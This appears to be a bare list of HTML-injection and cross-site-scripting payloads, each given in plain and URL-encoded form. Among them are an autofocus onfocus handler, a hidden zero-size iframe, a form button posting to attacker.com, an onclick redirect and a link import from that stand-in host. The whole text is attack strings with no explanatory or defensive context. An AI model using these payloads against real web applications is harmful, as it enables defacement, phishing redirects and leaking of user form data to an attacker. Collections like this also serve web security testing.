%3c%69%6e%70%75%74%20%69%64%3d%22%68%61%63%6b%65%72%22%20%6f%6e%66%6f%63%75%73%3d%77%72%69%74%65%28%22%45%78%70%6c%6f%69%74%22%29%20%61%75%74%6f%66%6f%63%75%73%3e
<h1 id="hacker">Exploit</h1>
%3c%68%31%20%69%64%3d%22%68%61%63%6b%65%72%22%3e%45%78%70%6c%6f%69%74%3c%2f%68%31%3e
<a id="hacker" href="www.attacker.com">Exploit</a>
%3c%61%20%69%64%3d%22%68%61%63%6b%65%72%22%20%68%72%65%66%3d%22%77%77%77%2e%61%74%74%61%63%6b%65%72%2e%63%6f%6d%22%3e%45%78%70%6c%6f%69%74%3c%2f%61%3e
<iframe id="hacker" src="http://attacker.com" height="0" width="0"></iframe>
<form id="hacker"></form><button form="hacker" formaction="http://attacker.com">X</button>
%3c%66%6f%72%6d%20%69%64%3d%22%68%61%63%6b%65%72%22%3e%3c%2f%66%6f%72%6d%3e%3c%62%75%74%74%6f%6e%20%66%6f%72%6d%3d%22%68%61%63%6b%65%72%22%20%66%6f%72%6d%61%63%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d%22%3e%58%3c%2f%62%75%74%74%6f%6e%3e
<input type="button" id="hacker" onclick="window.location.href='https://attacker.com';" value="Exploit" />
%3c%69%6e%70%75%74%20%74%79%70%65%3d%22%62%75%74%74%6f%6e%22%20%69%64%3d%22%68%61%63%6b%65%72%22%20%6f%6e%63%6c%69%63%6b%3d%22%77%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%27%68%74%74%70%73%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d%27%3b%22%20%76%61%6c%75%65%3d%22%45%78%70%6c%6f%69%74%22%20%2f%3e
<link rel="import" id="hacker" href="http://attacker.com" />
%3c%6c%69%6e%6b%20%72%65%6c%3d%22%69%6d%70%6f%72%74%22%20%69%64%3d%22%68%61%63%6b%65%72%22%20%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2e%63%6f%6d%22%20%2f%3e